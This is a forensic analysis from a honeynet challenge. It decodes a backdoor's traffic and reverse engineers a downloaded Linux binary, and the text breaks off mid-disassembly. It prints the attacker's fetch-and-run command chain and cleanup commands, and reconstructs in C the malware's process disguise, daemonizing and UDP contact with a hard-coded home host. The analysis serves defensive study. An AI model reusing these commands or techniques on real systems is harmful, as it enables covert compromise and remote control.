Scan of the Month 22 Analysis by Matei Conovici
===============================================


1. Introduction
---------------

This is an analysis of the activities the attacker from the Reverse
Challenge in July (http://project.honeynet.org) performed on a
compromised system.

It is my first entry for a SoTM challenge, so please bear with me :)


2. Tools
--------

 - tcpdump
 - tcpflow
 - objdump
 - the decoder for backdoor NVP traffic
 - home-grown perl/c programs for annotating the binary disassembly


3. Analysis
-----------

3.1 NVP backdoor traffic analysis
---------------------------------

First we begin by analysing the NVP backdoor traffic the attacker
generated. As known from the Reverse Challenge, the backdoor installed
is a server listening for commands sent using IP protocol 11
(NVP). The requests themselves come from spoofed IP addresses of other
compromised systems, acting as relays for the attacker. Let's find out
what's going on.

void:~$ tcpdump -r snort-0718\@1401.log -w 00-NVP-traffic.log proto 11

The decoder was slightly modified to display some more
information. Protocol was decoded manually using the information in
the Reverse Challenge reports.

void:~$ decoder -p 00-NVP-traffic.log | less

src: 94.0.146.98
dst: 172.16.183.2
dir: handler->agent

00 02 01 CB AD 90 32 00 00 00 00 00 00 00 00 00

Comments:

Command 02: Initialization, handler address is 203.173.144.50
	
Ok, so the actual address of the handler is 203.173.144.50. From here
on we will only look at the replies sent to it and ignore the other 8
fake addresses the backdoor replies to.
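
The address can be read straight off the payload: the four bytes
CB AD 90 32 at offset 3 are the handler address in network order. A
minimal sketch of that decoding step follows. The helper name
format_ipv4 is made up for this illustration and is not taken from the
decoder used above.

```c
#include <stdio.h>
#include <stddef.h>

/* Format four address bytes (network order) as a dotted quad.
 * `out` should have room for at least 16 bytes.
 * Hypothetical helper, not part of the original decoder. */
void format_ipv4(const unsigned char *p, char *out, size_t outlen)
{
	snprintf(out, outlen, "%u.%u.%u.%u",
		 (unsigned)p[0], (unsigned)p[1],
		 (unsigned)p[2], (unsigned)p[3]);
}
```

Called with a pointer to offset 3 of the initialization payload, this
produces the string 203.173.144.50.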

----

src: 192.146.201.172
dst: 172.16.183.2
dir: handler->agent

00 03 67 72 65 70 20 2D 69 20 22 7A 6F 6E 65 22  ..grep -i "zone"
20 2F 65 74 63 2F 6E 61 6D 65 64 2E 63 6F 6E 66   /etc/named.conf
00

Comments:

Command 03: Execute command and return output (grep -i "zone"
/etc/named.conf).

----
src: 172.16.183.2
dst: 203.173.144.50
dir: agent->handler

67 03 7A 6F 6E 65 20 22 2E 22 20 7B 0A 7A 6F 6E  g.zone "." {.zon
65 20 22 30 2E 30 2E 31 32 37 2E 69 6E 2D 61 64  e "0.0.127.in-ad
64 72 2E 61 72 70 61 22 20 7B 0A 00              dr.arpa" {      

Comments:

Output was:
-----------------
zone "." {
zone "0.0.127.in-addr.arpa" {
-----------------

The attacker will not be very pleased. This machine is not really a
nameserver.

----

src: 172.16.183.2
dst: 203.173.144.50
dir: agent->handler

67 04 00 6F 6E 65 20 22 2E 22 20 7B 0A 7A 6F 6E  g..one "." {.zon
65 20 22 30 2E 30 2E 31 32 37 2E 69 6E 2D 61 64  e "0.0.127.in-ad
64 72 2E 61 72 70 61 22 20 7B 0A 00              dr.arpa" {

Comments:

This is the "continuation" of the first reply packet. Actually, it's
the same data.

----

src: 168.148.27.14
dst: 172.16.183.2
dir: handler->agent

00 07 6B 69 6C 6C 61 6C 6C 20 2D 39 20 74 74 73  ..killall -9 tts
65 72 76 65 00                                   erve

Comments:

Command 07: Execute, do not send output (killall -9 ttserve)

This kills the 'ttserve' process if it is already running. We will see
below that the binary which gets installed is named ttserve.

----

src: 10.39.81.89
dst: 172.16.183.2
dir: handler->agent

00 07 6B 69 6C 6C 61 6C 6C 20 2D 39 20 74 74 73  ..killall -9 tts
65 72 76 65 00                                   erve

Comments:

Repeat the kill command, maybe the first packet was lost.

----

src: 58.248.76.90
dst: 172.16.183.2
dir: handler->agent

00 07 6B 69 6C 6C 61 6C 6C 20 2D 39 20 74 74 73  ..killall -9 tts
65 72 76 65 20 3B 20 6C 79 6E 78 20 2D 73 6F 75  erve ; lynx -sou
72 63 65 20 68 74 74 70 3A 2F 2F 32 31 36 2E 32  rce http://216.2
34 32 2E 31 30 33 2E 32 3A 38 38 38 32 2F 66 6F  42.103.2:8882/fo
6F 20 3E 20 2F 74 6D 70 2F 74 74 73 65 72 76 65  o > /tmp/ttserve
20 3B 20 63 68 6D 6F 64 20 37 35 35 20 2F 74 6D   ; chmod 755 /tm
70 2F 74 74 73 65 72 76 65 20 3B 20 63 64 20 2F  p/ttserve ; cd /
74 6D 70 20 3B 20 2E 2F 74 74 73 65 72 76 65 20  tmp ; ./ttserve 
3B 20 72 6D 20 2D 72 66 20 2F 74 6D 70 2F 74 74  ; rm -rf /tmp/tt
73 65 72 76 65 20 2E 2F 74 74 73 65 72 76 65 20  serve ./ttserve 
3B 00                                            ;

Comments:

Command 07: Execute command.

--
killall -9 ttserve
lynx -source http://216.242.103.2:8882/foo > /tmp/ttserve
chmod 755 /tmp/ttserve
cd /tmp
./ttserve
rm -rf /tmp/ttserve ./ttserve
--

Here, the attacker downloads a 'foo' file as /tmp/ttserve and launches
it, then removes the file.

After being launched, the file can be safely removed from the
filesystem. Since it's running, the kernel will not actually remove
the file until it is released (when program exits), but it will no
longer be visible in the /tmp directory.
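
The same kernel behaviour can be observed with an ordinary open file
descriptor, which is easier to demonstrate than a running executable.
The sketch below is only an analogy under that assumption: it creates
a temporary file, unlinks it while it is still open, and checks that
the data can still be read. The function name and the temp file
pattern are invented for the example.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Create a temp file, unlink it while it is still open, and check that
 * its contents remain readable through the open descriptor.
 * Returns 1 if the data survived the unlink, 0 otherwise. */
int readable_after_unlink(void)
{
	char path[] = "/tmp/unlink-demo-XXXXXX";
	char buf[8] = { 0 };
	int fd, ok;

	fd = mkstemp(path);
	if (fd < 0)
		return 0;

	if (write(fd, "hello", 5) != 5) {
		close(fd);
		unlink(path);
		return 0;
	}

	unlink(path);		/* the name is gone from /tmp ... */

	/* ... but the inode lives on until the last reference is dropped */
	ok = access(path, F_OK) != 0 &&
	     lseek(fd, 0, SEEK_SET) == 0 &&
	     read(fd, buf, 5) == 5 &&
	     memcmp(buf, "hello", 5) == 0;

	close(fd);
	return ok;
}
```

A running program holds a comparable reference to its own binary, which
is why 'rm' right after launch hides ttserve without stopping it.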

----

src: 218.209.145.27
dst: 172.16.183.2
dir: handler->agent

00 07 6B 69 6C 6C 61 6C 6C 20 2D 39 20 6C 79 6E  ..killall -9 lyn
78 20 3B 20 72 6D 20 2D 72 66 20 2F 74 6D 70 2F  x ; rm -rf /tmp/
74 74 73 65 72 76 65 3B 00                       ttserve;

Comments:

Command 07: execute command

--
killall -9 lynx
rm -rf /tmp/ttserve
--

After a while, if the download was not complete, kill lynx and remove
the partially downloaded file so it is not discovered.

----

src: 122.255.17.55
dst: 172.16.183.2
dir: handler->agent

00 07 6B 69 6C 6C 61 6C 6C 20 2D 39 20 6C 79 6E  ..killall -9 lyn
78 20 3B 20 72 6D 20 2D 72 66 20 2F 74 6D 70 2F  x ; rm -rf /tmp/
74 74 73 65 72 76 65 3B 00                       ttserve;

Comments:

Repeat same command, in case first packet was lost.

----

src: 26.44.146.84
dst: 172.16.183.2
dir: handler->agent

00 07 6B 69 6C 6C 61 6C 6C 20 2D 39 20 6C 79 6E  ..killall -9 lyn
78 20 3B 20 72 6D 20 2D 72 66 20 2F 74 6D 70 2F  x ; rm -rf /tmp/
74 74 73 65 72 76 65 3B 00                       ttserve;


Comments:

Yet again.


And ... this was it.

Looks like the only things the attacker was interested in were to a)
check if the machine is acting as a nameserver for interesting zones
and b) launch the foo executable he has downloaded.

Later, we will see that the address from which the file was downloaded
was his 'home base'.

Now, let's take a look at the downloaded file.


3.2 Analysis of 'foo'
---------------------

Amusingly, "someone" changed the contents of the snort log so that the
address 'foo' was downloaded from appears to be 11.11.11.11 instead of
216.242.103.2. Oh well :-)

The 'foo' file was extracted from the snort log using tcpflow:

void:~$ tcpflow -r snort-0718\@1401.log host 11.11.11.11 and port 8882

This will result in two files, each containing data sent by the two
endpoints of the tcp connection. We are interested in the data in
011.011.011.011.08882-172.016.183.002.01025.

void:~$ less 011.011.011.011.08882-172.016.183.002.01025
HTTP/1.1 200 OK
Server: Foobarcatdog1
Content-type: text/x-csrc
Content-length: 215464
Accept-Ranges: bytes

^?ELF^A^A^A^@^@^@^@^@^@^@^@^@^B^@^C^@^A^@^@^@<90><80>^4^@^@^@<A0>G^C^@^@^@^@^@4


OK, so it's an ELF binary, 215464 bytes in length. After editing the
file and removing the HTTP reply headers, we're left with the binary
itself.
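
I did the header removal by hand in an editor, but it is easy to
automate. The sketch below assumes the headers end with an empty line
(CR LF CR LF), as HTTP specifies; http_body_offset is a name made up
for this example.

```c
#include <stddef.h>
#include <string.h>

/* Return the offset of the HTTP body inside `data`, i.e. the first byte
 * after the blank line ("\r\n\r\n") that ends the headers, or -1 if no
 * header terminator is found. memcmp() is used instead of strstr()
 * because the body is binary and may contain NUL bytes. */
long http_body_offset(const unsigned char *data, size_t len)
{
	size_t i;

	for (i = 0; i + 4 <= len; i++) {
		if (memcmp(data + i, "\r\n\r\n", 4) == 0)
			return (long)(i + 4);
	}
	return -1;
}
```

Everything from that offset to the end of the tcpflow file would then be
written out as foo-binary, and its size should equal the Content-length
value of 215464.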

void:~$ file foo-binary
foo-binary: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped

What to do now? I've decided not to take the chance of running the
file, even in a restricted environment, but to reverse engineer it
instead.

Running 'strings' on it reveals some interesting stuff, part of which
is:

void:~$ strings foo-binary | grep library
@(#) The Linux C library 5.3.12

Aha, so it's built against the same C library as the backdoor was,
probably on the same system. Nice...

I've used a technique learned from some reverse challenge reports to
obtain the library function addresses. I've downloaded this version of
the library and unpacked libc.a, obtaining its object files.

First, I've obtained the list of 'call' addresses in the disassembly.

void:~$ objdump -d foo-binary | grep 'call   0x' | cut -f2 -dx | sort \
| uniq >routines.txt

There are 378 unique addresses called.

I wrote a small C program that linearly searches the .text section of
the foo binary for the .text section of each library object file. The
program replaces relocations in the object files with 0xFF, and these
bytes are ignored when looking for matches. If a match is found, each
symbol in the .text section of the object file is output as:

    foo_text_start + foo_match_offset + symbol_offset_in_object 

where:
	foo_text_start
		virtual memory address of foo's .text section
	foo_match_offset
		start of object .text section in foo .text section
	symbol_offset_in_object
		symbols' offset in the .text section of the library
		object file.
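
The core of that search can be sketched as follows. This is not the
matchfunctions source, just a minimal illustration of the idea as
described above; the function names are invented here.

```c
#include <stddef.h>

/* Search `hay` for `pat`, treating every 0xFF byte in `pat` as a
 * wildcard (a blanked-out relocation). Returns the offset of the first
 * match, or -1. Note that a genuine 0xFF byte in the object code is
 * also treated as a wildcard, so matching is a little looser than a
 * comparison with a separate mask would be. */
long find_masked(const unsigned char *hay, size_t hay_len,
		 const unsigned char *pat, size_t pat_len)
{
	size_t i, j;

	if (pat_len == 0 || pat_len > hay_len)
		return -1;

	for (i = 0; i + pat_len <= hay_len; i++) {
		for (j = 0; j < pat_len; j++) {
			if (pat[j] != 0xFF && pat[j] != hay[i + j])
				break;
		}
		if (j == pat_len)
			return (long)i;
	}
	return -1;
}

/* Virtual address of a library symbol inside foo, per the formula above. */
unsigned long symbol_address(unsigned long foo_text_start,
			     unsigned long foo_match_offset,
			     unsigned long symbol_offset_in_object)
{
	return foo_text_start + foo_match_offset + symbol_offset_in_object;
}
```

Here `hay` would be foo's .text section and `pat` the .text section of
one library object after its relocations have been blanked out.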

void:~$ ./matchfunctions -a -r routines.txt -d objects.txt -b \
foo-binary >libcalls.txt

objects.txt is a file containing the paths to each object file in the
library. The '-a' switch is used to generate a 'libmatches.txt' file
where ALL matching library objects' symbols are emitted.

void:~$ cut -f1 -d: libcalls.txt | sort | uniq | wc -l

tells me 276 of the 378 calls were found to be library calls. This
leaves 102 unresolved addresses. Most of these must be
intra-library calls.

Let's see which are the unresolved symbols.

Time to look at the annotated disassembly of foo. I wrote a small perl
script to annotate each 'call' instruction with the library function
name, if a match exists, or '<??>' if none was found.

void:~$ objdump -d foo-binary >disassemble
void:~$ annotate.pl disassemble | grep '??' | cut -f2 -dx | cut -f1 -d"  " | sort | uniq >calls.txt

To remove intra-library calls, I looked for the lowest symbol address
of the library. 

void:~$ sort libmatches.txt | head -1
080489e0: isalnum

void:~$ sort calls.txt | less
600cef30
8048080
8048110
8048134
8048258
80482b8
8048300
8048318
8048384
804841c
8048670
80489a8
8048b40
...

So, everything after 0x080489a8 in this list lies at or above
0x080489e0, which makes it library code and not interesting. The
remaining set is much more manageable.

0x600cef30 looks like bad disassembly so we take that out.

void:~$ less disassemble-annotated.s
08048080 <.init>:
 8048080:       e8 93 c9 02 00          call   0x8074a18                < ?? >
 8048085:       c2 00 00                ret    $0x0

[...]

08074a40 <.fini>:
 8074a40:       e8 cb 36 fd ff          call   0x8048110                < ?? >
 8074a45:       c2 00 00                ret    $0x0


OK, we also take out 0x08048080 and 0x08048110, which are library
initialization and finalization code. This leaves us with:

0x08048134
0x08048258
0x080482b8
0x08048300
0x08048318
0x08048384
0x0804841c
0x08048670
0x080489a8

These 9 routines are the routines of the attacker's program. I've
changed the annotate.pl script to read a second file (other than
library matches) to be able to assign names to these 9 functions as I
disassemble them and find out what they do.

First function is main() at 0x08048134, as can be seen at the
beginning of the disassembly:

 80480cf:       e8 6c bf 01 00          call   0x8064040                <__libc_init>
 80480d4:       68 40 4a 07 08          push   $0x8074a40
 80480d9:       e8 be d8 00 00          call   0x805599c                <atexit>
 80480de:       83 c4 04                add    $0x4,%esp
 80480e1:       e8 9a ff ff ff          call   0x8048080                < ?? >
 80480e6:       e8 49 00 00 00          call   0x8048134
 80480eb:       50                      push   %eax
 80480ec:       e8 5f d9 00 00          call   0x8055a50                <exit>
 80480f1:       5b                      pop    %ebx
 80480f2:       8d b4 26 00 00 00 00    lea    0x0(%esi,1),%esi
 80480f9:       8d b4 26 00 00 00 00    lea    0x0(%esi,1),%esi
 8048100:       b8 01 00 00 00          mov    $0x1,%eax
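
The unannotated call at 0x80480e6 is the one that matters here. Its
target can be double-checked from the instruction bytes alone, since
an e8 call carries a 32-bit little-endian displacement relative to the
next instruction. The helper below is a small sketch of that
arithmetic; call_target is a name chosen for this example.

```c
#include <stdint.h>

/* Target of an x86 near call (opcode e8): the 32-bit little-endian
 * displacement is relative to the address of the next instruction,
 * which is 5 bytes past the start of the call. */
uint32_t call_target(uint32_t insn_addr, const unsigned char *insn)
{
	uint32_t rel = (uint32_t)insn[1] |
		       ((uint32_t)insn[2] << 8) |
		       ((uint32_t)insn[3] << 16) |
		       ((uint32_t)insn[4] << 24);

	return insn_addr + 5 + rel;	/* wraps mod 2^32 for backward calls */
}
```

For the bytes e8 49 00 00 00 at 0x80480e6 this gives 0x8048134, and for
e8 9a ff ff ff at 0x80480e1 it gives 0x8048080, in agreement with the
listing. The value passed to exit() is the return value of the routine
at 0x8048134, which is what marks it as main().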

So we'll start with that.

 8048134:       55                      push   %ebp
 8048135:       89 e5                   mov    %esp,%ebp
 8048137:       81 ec 34 75 00 00       sub    $0x7534,%esp
 804813d:       c7 45 fc 00 00 00 00    movl   $0x0,0xfffffffc(%ebp)
 8048144:       68 30 75 00 00          push   $0x7530
 8048149:       6a 00                   push   $0x0
 804814b:       8d 85 cc 8a ff ff       lea    0xffff8acc(%ebp),%eax
 8048151:       50                      push   %eax
 8048152:       e8 2d c9 01 00          call   0x8064a84                <memset>
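
The prologue already gives away the frame layout. The disassembly
prints %ebp-relative displacements as unsigned 32-bit values, so they
have to be read as two's complement to get the real offsets. A small
sketch of that conversion (ebp_offset is a name made up here):

```c
#include <stdint.h>

/* Reinterpret a displacement printed as an unsigned 32-bit value
 * (e.g. 0xfffffffc) as the signed offset from %ebp it encodes. */
long ebp_offset(uint32_t disp)
{
	if (disp & 0x80000000u)
		return -(long)(0xffffffffu - disp) - 1;
	return (long)disp;
}
```

0xfffffffc decodes to -4 and 0xffff8acc to -30004, so the frame of
0x7534 (30004) bytes holds a 4-byte integer at the top and a buffer of
0x7530 (30000) bytes below it, which is exactly what memset clears.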

Disassembling this function and re-writing it into C code, it looks
like this:

int 
main(int argc, char **argv)
{
	int l1;
	char buffer[30000];

	l1 = 0;
	
	memset(buffer, 0, 30000);
	memset(argv[0], 0, strlen(argv[0]));
	
	strcpy(argv[0], "(nfsiod)");

	signal(SIGCHLD, SIG_IGN);

	/* parent exits after fork() */
	if (fork() != 0)
	   exit(0);

	/* become session leader */
	setsid();

	signal(SIGCHLD, SIG_IGN);

	/* this is usually 'daemon' */
	setuid(1);
	seteuid(1);

	/* parent exits after fork() */
	if (fork() != 0)
	   exit(0);

	signal(SIGPIPE, SIG_IGN);
	chdir("/");
	signal(SIGCHLD, SIG_IGN);

	while (1) {
	      l1 = function1(l1, buffer);		/* 0x0804841c */
	      
	      function2(l1, buffer, 30000);		/* 0x08048670 */

	      sleep(1);
	}
}

The code is "a bit" naive, but what it tries to do is daemonize
and hide itself by rewriting its command line, so that it shows up in
'ps' as a system process (nfsiod, running as user daemon).

It seems that the actual work is performed in function1() and
function2(), so we're going to leave those and take a look at the
other 6 functions.

 8048258:       55                      push   %ebp
 8048259:       89 e5                   mov    %esp,%ebp
 804825b:       83 ec 08                sub    $0x8,%esp
 804825e:       8b 45 08                mov    0x8(%ebp),%eax
 8048261:       50                      push   %eax
 8048262:       e8 71 32 00 00          call   0x804b4d8                <inet_addr>
 8048267:       83 c4 04                add    $0x4,%esp
 804826a:       89 c0                   mov    %eax,%eax
 804826c:       89 c2                   mov    %eax,%edx
 804826e:       89 55 fc                mov    %edx,0xfffffffc(%ebp)
 8048271:       83 fa ff                cmp    $0xffffffff,%edx
 8048274:       75 39                   jne    0x80482af
 8048276:       8b 45 08                mov    0x8(%ebp),%eax
 8048279:       50                      push   %eax
 804827a:       e8 4d 23 00 00          call   0x804a5cc		<gethostbyname>
 804827f:       83 c4 04                add    $0x4,%esp
 8048282:       89 c0                   mov    %eax,%eax
 8048284:       89 45 f8                mov    %eax,0xfffffff8(%ebp)
 8048287:       83 7d f8 00             cmpl   $0x0,0xfffffff8(%ebp)
 804828b:       75 0b                   jne    0x8048298
 804828d:       6a 00                   push   $0x0
 804828f:       e8 bc d7 00 00          call   0x8055a50                <exit>
 8048294:       83 c4 04                add    $0x4,%esp
 8048297:       90                      nop    
 8048298:       6a 04                   push   $0x4
 804829a:       8d 45 fc                lea    0xfffffffc(%ebp),%eax
 804829d:       50                      push   %eax
 804829e:       8b 45 f8                mov    0xfffffff8(%ebp),%eax
 80482a1:       8b 50 10                mov    0x10(%eax),%edx
 80482a4:       8b 02                   mov    (%edx),%eax
 80482a6:       50                      push   %eax
 80482a7:       e8 3c b6 01 00          call   0x80638e8                <bcopy>
 80482ac:       83 c4 0c                add    $0xc,%esp
 80482af:       8b 45 fc                mov    0xfffffffc(%ebp),%eax
 80482b2:       eb 00                   jmp    0x80482b4
 80482b4:       89 ec                   mov    %ebp,%esp
 80482b6:       5d                      pop    %ebp
 80482b7:       c3                      ret    

This is a helper routine, to obtain an IP address out of a string
representation of either an IP address or a host name. Seems the
attacker doesn't know gethostbyname() already does that.

Re-written into C, this routine looks something like this:

unsigned int
ip_address(char *name) 
{
	unsigned int ip;
	struct hostent *he;

	ip = inet_addr(name);
	if (ip != INADDR_NONE)		/* 0xffffffff */
	   return ip;

	he = gethostbyname(name);
	if (!he)
	   exit(0);

	bcopy(he->h_addr, &ip, 4);
	return ip;
}

Let's look at the next function, at 0x080482b8.

 80482b8:       55                      push   %ebp
 80482b9:       89 e5                   mov    %esp,%ebp
 80482bb:       83 ec 04                sub    $0x4,%esp
 80482be:       6a 11                   push   $0x11
 80482c0:       6a 02                   push   $0x2
 80482c2:       6a 02                   push   $0x2
 80482c4:       e8 27 bd 01 00          call   0x8063ff0                <socket>
 80482c9:       83 c4 0c                add    $0xc,%esp
 80482cc:       89 c0                   mov    %eax,%eax
 80482ce:       89 45 fc                mov    %eax,0xfffffffc(%ebp)
 80482d1:       83 7d fc 00             cmpl   $0x0,0xfffffffc(%ebp)
 80482d5:       75 0d                   jne    0x80482e4
 80482d7:       6a 00                   push   $0x0
 80482d9:       e8 72 d7 00 00          call   0x8055a50                <exit>
 80482de:       83 c4 04                add    $0x4,%esp
 80482e1:       8d 76 00                lea    0x0(%esi),%esi
 80482e4:       68 00 08 00 00          push   $0x800
 80482e9:       6a 04                   push   $0x4
 80482eb:       8b 45 fc                mov    0xfffffffc(%ebp),%eax
 80482ee:       50                      push   %eax
 80482ef:       e8 94 c1 01 00          call   0x8064488                <fcntl>
 80482f4:       83 c4 0c                add    $0xc,%esp
 80482f7:       8b 45 fc                mov    0xfffffffc(%ebp),%eax
 80482fa:       eb 00                   jmp    0x80482fc
 80482fc:       89 ec                   mov    %ebp,%esp
 80482fe:       5d                      pop    %ebp
 80482ff:       c3                      ret    

Re-writing this back into C, this function looks like this:

int
nblk_udp_socket()
{
	int sock;

	sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
	if (sock == 0)
	   exit(0);

	fcntl(sock, F_SETFL, O_NONBLOCK);

	return sock;
}

Ok, so this function creates a non-blocking UDP socket. The check on
the return value of socket() is wrong: socket() returns -1 on error,
not 0.
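
For comparison, a version with the error handling done properly might
look like the sketch below. It is not recovered from the binary: the
function name, the "return -1 instead of exit" policy and the
preservation of existing flags are my own choices for the illustration.

```c
#include <fcntl.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>

/* Create a non-blocking UDP socket; returns the descriptor or -1.
 * Failure is detected with "< 0", since 0 is a valid descriptor and
 * -1 is the error value. */
int nblk_udp_socket_checked(void)
{
	int sock, flags;

	sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
	if (sock < 0)
		return -1;

	/* keep the existing status flags instead of overwriting them */
	flags = fcntl(sock, F_GETFL, 0);
	if (flags < 0 || fcntl(sock, F_SETFL, flags | O_NONBLOCK) < 0) {
		close(sock);
		return -1;
	}
	return sock;
}
```

In the attacker's version a failed socket() call goes unnoticed and -1
is handed to the callers as if it were a valid descriptor.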

Next function is at 0x08048300.

 8048300:       55                      push   %ebp
 8048301:       89 e5                   mov    %esp,%ebp
 8048303:       8b 45 08                mov    0x8(%ebp),%eax
 8048306:       50                      push   %eax
 8048307:       e8 50 c1 01 00          call   0x806445c                <close>
 804830c:       83 c4 04                add    $0x4,%esp
 804830f:       31 c0                   xor    %eax,%eax
 8048311:       eb 01                   jmp    0x8048314
 8048313:       90                      nop    
 8048314:       89 ec                   mov    %ebp,%esp
 8048316:       5d                      pop    %ebp
 8048317:       c3                      ret    

This is a function that proves to be very useful :-) It is a
much-needed wrapper around close() that always returns 0. We'll call
it fd_close().

int
fd_close(int fd)
{
	close(fd);
	return 0;
}

Next function, at 0x08048318:


 8048318:       55                      push   %ebp
 8048319:       89 e5                   mov    %esp,%ebp
 804831b:       83 ec 10                sub    $0x10,%esp
 804831e:       83 7d 08 00             cmpl   $0x0,0x8(%ebp)
 8048322:       74 58                   je     0x804837c
 8048324:       6a 10                   push   $0x10
 8048326:       8d 45 f0                lea    0xfffffff0(%ebp),%eax
 8048329:       50                      push   %eax
 804832a:       e8 65 c5 01 00          call   0x8064894                <bzero>
 804832f:       83 c4 08                add    $0x8,%esp
 8048332:       68 53 4a 07 08          push   $0x8074a53
 8048337:       e8 1c ff ff ff          call   0x8048258                <ip_address>
 804833c:       83 c4 04                add    $0x4,%esp
 804833f:       89 c0                   mov    %eax,%eax
 8048341:       89 45 f4                mov    %eax,0xfffffff4(%ebp)
 8048344:       66 c7 45 f0 02 00       movw   $0x2,0xfffffff0(%ebp)
 804834a:       66 c7 45 f2 d0 a5       movw   $0xa5d0,0xfffffff2(%ebp)
 8048350:       6a 10                   push   $0x10
 8048352:       8d 45 f0                lea    0xfffffff0(%ebp),%eax
 8048355:       50                      push   %eax
 8048356:       6a 00                   push   $0x0
 8048358:       8b 45 10                mov    0x10(%ebp),%eax
 804835b:       50                      push   %eax
 804835c:       8b 45 0c                mov    0xc(%ebp),%eax
 804835f:       50                      push   %eax
 8048360:       8b 45 08                mov    0x8(%ebp),%eax
 8048363:       50                      push   %eax
 8048364:       e8 27 bc 01 00          call   0x8063f90                <sendto>
 8048369:       83 c4 18                add    $0x18,%esp
 804836c:       89 c0                   mov    %eax,%eax
 804836e:       85 c0                   test   %eax,%eax
 8048370:       7d 0a                   jge    0x804837c
 8048372:       6a 00                   push   $0x0
 8048374:       e8 d7 d6 00 00          call   0x8055a50                <exit>
 8048379:       83 c4 04                add    $0x4,%esp
 804837c:       31 c0                   xor    %eax,%eax
 804837e:       eb 00                   jmp    0x8048380
 8048380:       89 ec                   mov    %ebp,%esp
 8048382:       5d                      pop    %ebp
 8048383:       c3                      ret    

Let's translate this into C:

int
send_home_message(int sock, char *buffer, int len)
{
	struct sockaddr_in saddr;

	/* cmpl $0x0,0x8(%ebp): nothing to do without a socket */
	if (sock == 0)
	   return 0;

	bzero(&saddr, sizeof(struct sockaddr_in));

	saddr.sin_addr.s_addr = ip_address("216.242.103.2");
	saddr.sin_family = AF_INET;
	saddr.sin_port   = 42448; /* htons(53413) */

	if (sendto(sock, buffer, len, 0, (struct sockaddr *) & saddr,
					 sizeof(struct sockaddr_in)) < 0)
			 exit(0);

	return 0;
}

This routine sends some data to the mother ship :-)
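
The port deserves a second look, because the immediate in the
disassembly (0xa5d0) is not the port number itself. The code stores a
16-bit value on a little-endian machine, while sin_port is interpreted
in network (big-endian) order. The sketch below spells out that
conversion; the helper name is invented for the example.

```c
#include <stdint.h>

/* Port number as seen on the wire, given the 16-bit immediate that the
 * little-endian x86 code stores into sin_port: the low byte of the
 * immediate lands first in memory and is therefore the high byte of
 * the network-order port. */
uint16_t wire_port_from_le_imm(uint16_t imm)
{
	unsigned char mem[2];

	mem[0] = (unsigned char)(imm & 0xff);	/* first byte in memory */
	mem[1] = (unsigned char)(imm >> 8);	/* second byte in memory */

	return (uint16_t)((mem[0] << 8) | mem[1]);
}
```

For 0xa5d0 this yields 0xd0a5, which is 53413 in decimal.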

Next routine is at 0x08048384.

 8048384:       55                      push   %ebp
 8048385:       89 e5                   mov    %esp,%ebp
 8048387:       83 ec 18                sub    $0x18,%esp
 804838a:       c7 45 ec 10 00 00 00    movl   $0x10,0xffffffec(%ebp)
 8048391:       c7 45 e8 00 00 00 00    movl   $0x0,0xffffffe8(%ebp)
 8048398:       8b 45 10                mov    0x10(%ebp),%eax
 804839b:       50                      push   %eax
 804839c:       8b 45 0c                mov    0xc(%ebp),%eax
 804839f:       50                      push   %eax
 80483a0:       e8 ef c4 01 00          call   0x8064894                <bzero>
 80483a5:       83 c4 08                add    $0x8,%esp
 80483a8:       83 7d 08 00             cmpl   $0x0,0x8(%ebp)
 80483ac:       74 66                   je     0x8048414
 80483ae:       6a 10                   push   $0x10
 80483b0:       8d 45 f0                lea    0xfffffff0(%ebp),%eax
 80483b3:       50                      push   %eax
 80483b4:       e8 db c4 01 00          call   0x8064894                <bzero>
 80483b9:       83 c4 08                add    $0x8,%esp
 80483bc:       68 53 4a 07 08          push   $0x8074a53
 80483c1:       e8 92 fe ff ff          call   0x8048258                <ip_address>
 80483c6:       83 c4 04                add    $0x4,%esp
 80483c9:       89 c0                   mov    %eax,%eax
 80483cb:       89 45 f4                mov    %eax,0xfffffff4(%ebp)
 80483ce:       66 c7 45 f0 02 00       movw   $0x2,0xfffffff0(%ebp)
 80483d4:       66 c7 45 f2 d0 a5       movw   $0xa5d0,0xfffffff2(%ebp)
 80483da:       8d 45 ec                lea    0xffffffec(%ebp),%eax
 80483dd:       50                      push   %eax
 80483de:       8d 45 f0                lea    0xfffffff0(%ebp),%eax
 80483e1:       50                      push   %eax
 80483e2:       6a 00                   push   $0x0
 80483e4:       8b 45 10                mov    0x10(%ebp),%eax
 80483e7:       50                      push   %eax
 80483e8:       8b 45 0c                mov    0xc(%ebp),%eax
 80483eb:       50                      push   %eax
 80483ec:       8b 45 08                mov    0x8(%ebp),%eax
 80483ef:       50                      push   %eax
 80483f0:       e8 ef ba 01 00          call   0x8063ee4                <recvfrom>
 80483f5:       83 c4 18                add    $0x18,%esp
 80483f8:       89 c0                   mov    %eax,%eax
 80483fa:       89 45 e8                mov    %eax,0xffffffe8(%ebp)
 80483fd:       83 7d e8 00             cmpl   $0x0,0xffffffe8(%ebp)
 8048401:       7d 09                   jge    0x804840c
 8048403:       31 c0                   xor    %eax,%eax
 8048405:       eb 11                   jmp    0x8048418
 8048407:       90                      nop    
 8048408:       eb 0a                   jmp    0x8048414
 804840a:       8d 36                   lea    (%esi),%esi
 804840c:       b8 01 00 00 00          mov    $0x1,%eax
 8048411:       eb 05                   jmp    0x8048418
 8048413:       90                      nop    
 8048414:       31 c0                   xor    %eax,%eax
 8048416:       eb 00                   jmp    0x8048418
 8048418:       89 ec                   mov    %ebp,%esp
 804841a:       5d                      pop    %ebp
 804841b:       c3                      ret


This looks like the inverse routine of send_home_message, we'll call
it recv_home_message.

int
recv_home_message(int sock, char *buffer, int len)
{
	struct sockaddr_in saddr;
	int slen;
	int nbytes;

	slen = sizeof(struct sockaddr_in);
	nbytes = 0;

	bzero(buffer, len);

	/* cmpl $0x0,0x8(%ebp): nothing to do without a socket */
	if (sock == 0)
	   return 0;

	bzero(& saddr, sizeof(struct sockaddr_in));

	saddr.sin_addr.s_addr = ip_address("216.242.103.2");
	saddr.sin_family = AF_INET;
	saddr.sin_port   = 42448; /* htons(53413) */

	nbytes = recvfrom(sock, buffer, len, 0, (struct sockaddr *) & saddr, &slen);
	if (nbytes >= 0)
	   return 1;

	return 0;
}

The following two functions are rather long, because they actually
perform some work (these are the two routines called from main), so
we'll skip them for now and look at 0x080489a8 first.


 80489a8:       55                      push   %ebp
